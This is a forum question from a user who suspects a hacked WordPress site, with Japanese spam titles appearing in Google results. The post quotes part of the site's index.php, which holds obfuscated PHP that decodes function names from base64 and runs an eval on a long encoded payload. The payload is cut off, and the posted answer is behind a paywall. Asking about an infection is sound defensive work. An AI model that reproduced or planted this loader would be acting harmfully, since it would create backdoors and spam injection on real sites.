troubleshooting Question

Website hacked?

Avatar of doctorbill
doctorbillFlag for United Kingdom of Great Britain and Northern Ireland asked on
HTMLPHPWordPress
7 Comments1 Solution28 ViewsLast Modified:
I have been asked to investigate the following website
If I type in "aurumsearch" into the google search box, I get the following page:The link works perfectly well and goes to the correct page
If I inspect the page, the element that brings this link up is:
<h3 class="LC20lb DKV0Md">呼出ハーン Cole Haan レディース 袋 ショルダーバッグ ...</h3>

If I go to the site host and look at the index.php page code in filemanager (Plesk control panel) of the wordpress site, the following shows up (only part of the page text shown):

Index.php
<?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZUhNT05nbXhBQkt3aHBhWWRER25yUlp1Rm9pbFFXWFN0Y1VMUGJreUNqVnZ6c3FUZkpFSWxpbkFTdVdnaFlGWG1aS3ZNa3RqSEx5SVVid0VPcE5HZXFmY3pzSlZ4ckRhUENCUm9kUVR6azlYS2loU3hXRFZxVzlWTjNkRXF0OVZNdEVJeVZ1WEZSQ1N4SllQeU5TUEtwOUlOM1Mwdk5kMEZ4SjdrT1paeXd1bXlqREl2M0xaczI1b3lObVpxM0xQRnhkNGxpbW95MkQwdjI5SU10RElNeFRaRkdZN2tPWldNcDVyTXRFYXN3WTRsaW1veTJEMHYyOUlNdERJTXh1Sk1OZENGTkNTeHdodVR4WVp5d2hiZGlEVnNrMDlUd1RaVGlkRU1pRFZzd2h3VHJDU3h3aHVUeFlaeXdtV01wNXJNdEVhc0U5RWx0RVBNaW5iZDJTMXFXZ29LcDVaTXhxWkZOQ1N4d2h1VHhodVR4aHVkdFNhc3doOVR0UzFxV2dvS3A1Wk14dWJxM0xWS3A1akZHTDFxV1haQVgwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjBtVU9mTFVmd1h1eVdVQ3EyZlpBWDBGVHhodVR4aHVUeFlyTU5kQ04zU0VNdDlYTXh1SnYyOUljeFlrRERkblIxWWZOMVNSUlU5cExEZGRMRUVPTGZER2N4WXRPZmdSTEdKN2tPYnVUeGh1VHhodVR0UzFxV2dvcTJEMHMzWTBGeExyczI0Q1RRU0RmSmd6ZlVMb2YxU25OMXlVZkpFdHBmbXpmMU9DVFF5WVJVU1VGUkNTeHUwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjFkVURVREdSRUxHT2Y1UkxKREdjaUxWTXBmWkFYMEZUeGh1VHhodVR4WXJNTmRDTjNTRU10OVhNeHVKdjI5SWN4WWtERGRuUjFZZk4xTGRSZkR6RERPQ1RrUVZueEo3a09idVR4aHVUeGh1VHhMVnlOUzFzaU91ekdZck1OZENOMkQ0eXBuYmR0U2Fzd0o3a09idVR4aHVUeGh1VHRTMXFXZ292MmdhcTJmYmR0U2Fzd0o3a09idVR4aHVvcERDcTJEN2tPYnVUeGh1VHhodVR4TFZ5TlMxc2lPdXpHWVdLcGdFTjJNRU1VOXJzMjUweXA1

Any ideas what is going on here - is it a hack?
ASKER CERTIFIED SOLUTION
David Favor
Fractional CTO
Join our community to see this answer!
Unlock 1 Answer and 7 Comments.
Start Free Trial
Learn from the best

Network and collaborate with thousands of CTOs, CISOs, and IT Pros rooting for you and your success.

Andrew Hancock - VMware vExpert
See if this solution works for you by signing up for a 7 day free trial.
Unlock 1 Answer and 7 Comments.
Try for 7 days

”The time we save is the biggest benefit of E-E to our team. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange.

-Mike Kapnisakis, Warner Bros